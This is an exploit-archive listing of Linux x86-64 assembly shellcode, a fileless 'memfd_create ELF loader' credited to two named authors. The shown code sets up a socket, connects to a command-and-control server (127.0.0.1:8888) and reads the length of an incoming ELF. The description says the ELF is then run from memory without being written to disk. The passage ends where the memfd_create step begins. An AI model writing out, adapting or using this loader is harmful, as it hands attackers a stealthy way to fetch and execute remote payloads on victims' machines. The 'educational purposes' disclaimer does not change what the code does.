Exploits / Vulnerability Discovered : 2023-08-21 |
Type : shellcode |
Platform : linux
This exploit / vulnerability Linux/x64 memfd_create elf loader shellcode (170 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Shellcode Title: Linux/x64 - memfd_create ELF loader (170 bytes)
# Shellcode Author: Ivan Nikolsky (enty8080) & Tomas Globis (tomasglgg)
# Tested on: Linux (x86_64)
# Shellcode Description: This shellcode attempts to establish reverse TCP connection, reads ELF length, reads ELF and maps it into the memory, creates memory file descriptor, writes loaded ELF to it and executes. This shellcode can be used for fileless ELF execution, because no data is writted to disk
# Blog post: https://blog.entysec.com/2023-04-02-remote-elf-loading/
# Original code: https://github.com/EntySec/Pawn
section .text
global _start
_start:
; Set up socket for further communication with C2
;
; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
push 0x29
pop rax
cdq
push 0x2
pop rdi
push 0x1
pop rsi
syscall
; Connect to the C2 server
;
; int connect(int sockfd, {
; sa_family=AF_INET,
; sin_port=htons(8888),
; sin_addr=inet_addr("127.0.0.1")
; }, 16);
xchg rdi, rax
mov rcx, 0x0100007fb8220002
push rcx
mov rsi, rsp
push 0x10
pop rdx
push 0x2a
pop rax
syscall
; Read ELF length from socket
;
; read(unsigned int fd, char *buf, 8);
pop rcx
push 0x8
pop rdx
push 0x0
lea rsi, [rsp]
xor rax, rax
syscall
; Save length to r12 and socket descriptor to r13
pop r12
push rdi
pop r13
; Create file descriptor for ELF file
;
; int memfd_create("", 0);